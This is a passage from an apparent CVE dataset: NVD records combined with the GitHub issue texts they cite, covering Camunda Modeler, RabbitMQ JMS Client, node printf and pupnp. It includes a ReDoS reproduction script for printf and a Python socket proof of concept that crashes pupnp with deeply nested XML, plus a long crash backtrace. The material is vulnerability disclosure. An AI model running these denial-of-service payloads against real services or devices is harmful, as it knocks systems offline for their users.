"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/camunda/camunda-modeler/issues/2143"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:camunda:modeler:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3E8FC2A3-2C9A-48E2-A874-9D63E2CB0E20",
"versionEndExcluding": null,
"versionEndIncluding": "4.6.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"862"
] | 862 | https://github.com/camunda/camunda-modeler/issues/2143 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"camunda",
"camunda-modeler"
] | __Describe the Bug__
Hi,
Great work!
We did a security analysis and found that `app/lib/preload.js` directly expose risky ipcRenderer instance to unsafe renderer process, which enables a remote attacker to abuse sensitive methods in the main process by crafting malicious ipc message.
I notice that the app has already disabled node integration in unsafe renderers(https://github.com/camunda/camunda-modeler/commit/92ba66d3e7ae85130b71cf7fc869b2066aadf67f), which is good. However, such direct IPC export may re-expose many sensitive primitives to the attacker.
Here is the exposure site.
https://github.com/camunda/camunda-modeler/blob/a5874345f259188b39bd6b2448a64e238fa700bb/app/lib/preload.js#L27-L37
By sending a message to `file:write` channel. The attacker may read and write malicious content to the user filesystem.
https://github.com/camunda/camunda-modeler/blob/6f1497c41917bc12bb2e44b3fa3c49b36f32ee72/app/lib/index.js#L186-L194
__Expected Behavior__
I could think of two possible solutions:
- enforce security checks when receiving events on sensitive channels (e.g., file read/write).
- avoid directly exposing `ipcRenderer` to untrusted domains.
---
Ref. [CVE-2021-28154](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28154) | Arbitrary filesystem manipulation vulnerability introduced by IPC exposure | https://api.github.com/repos/camunda/camunda-modeler/issues/2143/comments | 5 | 2021-03-09T16:17:42Z | 2021-03-15T14:20:13Z | https://github.com/camunda/camunda-modeler/issues/2143 | 826,182,019 | 2,143 | 1,751 |
CVE-2020-36282 | 2021-03-12T01:15:12.373 | JMS Client for RabbitMQ 1.x before 1.15.2 and 2.x before 2.2.0 is vulnerable to unsafe deserialization that can result in code execution via crafted StreamMessage data. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/rabbitmq/rabbitmq-jms-client/issues/135"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/rabbitmq/rabbitmq-jms-client/releases/tag/v1.15.2"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/rabbitmq/rabbitmq-jms-client/releases/tag/v2.2.0"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://medium.com/%40ramon93i7/a99645d0448b"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/rabbitmq/rabbitmq-jms-client/issues/135"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/rabbitmq/rabbitmq-jms-client/releases/tag/v1.15.2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/rabbitmq/rabbitmq-jms-client/releases/tag/v2.2.0"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://medium.com/%40ramon93i7/a99645d0448b"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:rabbitmq:jms_client:*:*:*:*:*:rabbitmq:*:*",
"matchCriteriaId": "88DCB385-FDA7-44B3-B4DF-B3FAE97D5AE2",
"versionEndExcluding": "1.15.2",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "1.0.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:rabbitmq:jms_client:*:*:*:*:*:rabbitmq:*:*",
"matchCriteriaId": "68C3DFC0-F110-4D50-B40A-70486BCC913F",
"versionEndExcluding": "2.2.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "2.0.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"502"
] | 502 | https://github.com/rabbitmq/rabbitmq-jms-client/issues/135 | [
"Patch",
"Third Party Advisory"
] | github.com | [
"rabbitmq",
"rabbitmq-jms-client"
] | `StreamMessage` should use the same "white list" mechanism as `ObjectMessage` to avoid some arbitrary code execution on deserialization.
Even though `StreamMessage` is supposed to handle only primitive types, it is still to possible to send a message that contains an arbitrary serializable instance. The consuming application application may then execute code from this class on deserialization.
The fix consists in using the list of trusted packages that can be set at the connection factory level. | Limit StreamMessage deserialization | https://api.github.com/repos/rabbitmq/rabbitmq-jms-client/issues/135/comments | 0 | 2020-11-02T10:38:12Z | 2020-11-02T12:10:38Z | https://github.com/rabbitmq/rabbitmq-jms-client/issues/135 | 734,391,983 | 135 | 1,752 |
CVE-2021-23354 | 2021-03-12T15:15:14.207 | The package printf before 0.6.1 are vulnerable to Regular Expression Denial of Service (ReDoS) via the regex string /\%(?:\(([\w_.]+)\)|([1-9]\d*)\$)?([0 +\-\]*)(\*|\d+)?(\.)?(\*|\d+)?[hlL]?([\%bscdeEfFgGioOuxX])/g in lib/printf.js. The vulnerable regular expression has cubic worst-case time complexity. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 1.4,
"source": "report@snyk.io",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "report@snyk.io",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/adaltas/node-printf/issues/31"
},
{
"source": "report@snyk.io",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/adaltas/node-printf/pull/32"
},
{
"source": "report@snyk.io",
"tags": [
"Broken Link"
],
"url": "https://snyk.io/vuln/SNYK-JS-PRINTF-1072096"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/adaltas/node-printf/issues/31"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/adaltas/node-printf/pull/32"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Broken Link"
],
"url": "https://snyk.io/vuln/SNYK-JS-PRINTF-1072096"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:adaltas:printf:*:*:*:*:*:node.js:*:*",
"matchCriteriaId": "355FBD56-0D7A-4DB1-9517-BAD18C121E39",
"versionEndExcluding": "0.6.1",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"1333"
] | 1333 | https://github.com/adaltas/node-printf/issues/31 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"adaltas",
"node-printf"
] | Hi,
I would like to report two Regular Expression Denial of Service (REDoS) vulnerability in `printf`.
It allows cause a denial of service when using crafted invalid formats.
You can execute the code below to reproduce the vulnerability.
```JS
var printf = require("printf")
function build_attack(n) {
var ret = "%(0)0"
for (var i = 0; i < n; i++) {
ret += "0"
}
return ret+"◎";
}
for(var i = 1; i <= 50000; i++) {
if (i % 1000 == 0) {
var time = Date.now();
var attack_str = build_attack(i)
printf(attack_str, -42)
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}
}
```
Feel free to contact me if you have any questions.
Best regards,
Yeting Li
| ReDoS in printf | https://api.github.com/repos/adaltas/node-printf/issues/31/comments | 5 | 2021-02-09T11:49:09Z | 2021-02-12T12:21:35Z | https://github.com/adaltas/node-printf/issues/31 | 804,479,506 | 31 | 1,753 |
CVE-2021-28302 | 2021-03-12T15:15:14.377 | A stack overflow in pupnp before version 1.14.5 can cause the denial of service through the Parser_parseDocument() function. ixmlNode_free() will release a child node recursively, which will consume stack space and lead to a crash. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/pupnp/pupnp/issues/249"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/pupnp/pupnp/releases/tag/release-1.14.5"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/pupnp/pupnp/issues/249"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/pupnp/pupnp/releases/tag/release-1.14.5"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:pupnp_project:pupnp:*:*:*:*:*:*:*:*",
"matchCriteriaId": "AEB13C63-2F47-4A96-B84F-5226835BDCBF",
"versionEndExcluding": "1.14.5",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"770"
] | 770 | https://github.com/pupnp/pupnp/issues/249 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"pupnp",
"pupnp"
] | hi, this poc caused a crash.
When parsing xml, if there if too many "<a>" in it ,that causes a crash.
The problem is in the function Parser_parseDocument() , After parses all < a >, it can't find the closed node, and finally enters the errorhandler. When using ixmlDocument_free(), When releases gRootDoc, ixmlNode_free() will release the child node <a> recursively, which will consume stack space. If the recursive depth is not limited, it will cause crash. POC and crash are below.
I suggest adding an interface that limits the depth of recursion.
the stack size of my device
$ulimit -s
8192
poc:
```
import socket
MS2 = """<?xml version="1.0" encoding="utf-8" standalone="no"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<s:Body>
<u:GetVolume xmlns:u="urn:schemas-upnp-org:service:RenderingControl:1">
<InstanceID>0</InstanceID>
<Channel>Master</Channel>
</u:GetVolume>
</s:Body>
<Anomaly>""" + "<a>"*100000 + """</Anomaly>""" + """
</s:Envelope>"""
MS1 = """POST /upnp/service/RenderingControl/Control HTTP/1.1\r\nHOST: 192.168.1.44:50000
Content-Length: """ + str(len(MS2)) + """
Content-type: text/xml; charset="utf-8"
SOAPACTION: "urn:schemas-upnp-org:service:RenderingControl:1#GetVolume"
USER-AGENT: Linux/4.14.150_s5, UPnP/1.0, Portable SDK for UPnP devices/1.12.0
CONNECTION: close
"""
address = ("192.168.1.4", 49153)
skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
skt.connect(address)
skt.send(MS1.encode() + MS2.encode())
d = skt.recv(999)
print(d.decode())
```
android crash
tombstone:
```backtrace
*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
Build fingerprint: 'xxx/xxx-111/xxx-111:10/xxx-111/2.0.1.73cust format error.:user/release-keys'
Revision: '0'
ABI: 'arm'
Timestamp: 2021-01-07 07:35:02+0800
pid: 16370, tid: 16813, name: Thread-4 >>> com.xxx.dlna.dmr <<<
uid: 1000
signal 11 (SIGSEGV), code 2 (SEGV_ACCERR), fault addr 0xbd380ff8
r0 b3627778 r1 8721bf1f r2 eca72108 r3 0000001a
r4 b3627740 r5 0000000c r6 00000000 r7 0000003c
r8 dbf2344c r9 dbf23440 r10 0000006a r11 dbf23444
ip c065e134 sp bd381000 lr c0658731 pc c0658720
backtrace:
00 pc 00003720 /system/lib/libixml.so (ixmlNode_free+6) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
01 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
02 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
03 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
04 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
05 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
06 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
07 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
08 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
09 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
10 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
11 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
12 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
13 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
14 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
15 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
16 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
17 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
18 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
19 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
20 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
21 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
22 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
23 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
24 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
25 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
26 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
27 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
28 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
29 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
30 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
31 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
32 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
33 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
34 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
35 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
36 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
37 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
38 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
39 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
40 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
41 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
42 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
43 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
44 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
45 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
46 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
47 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
48 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
49 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
50 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
51 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
52 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
53 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
54 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
55 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
56 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
57 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
58 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
59 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
60 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
61 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
62 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
63 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
64 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
65 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
66 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
67 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
68 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
69 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
70 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
71 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
72 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
73 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
74 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
75 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
76 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
77 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
78 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
79 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
80 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
81 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
82 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
83 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
84 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
85 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
86 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
87 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
88 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
89 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
90 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
91 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
92 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
93 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
94 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
95 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
96 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
97 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
98 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
99 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
100 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
101 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
102 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
103 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
104 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
105 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
106 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
107 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
108 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
109 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
110 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
111 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
112 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
113 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
114 pc 0000372d /system/lib/libixml.so (ixmlNode_free+18) (BuildId: f77e127d13ec2d5e6115a01dc922840b)
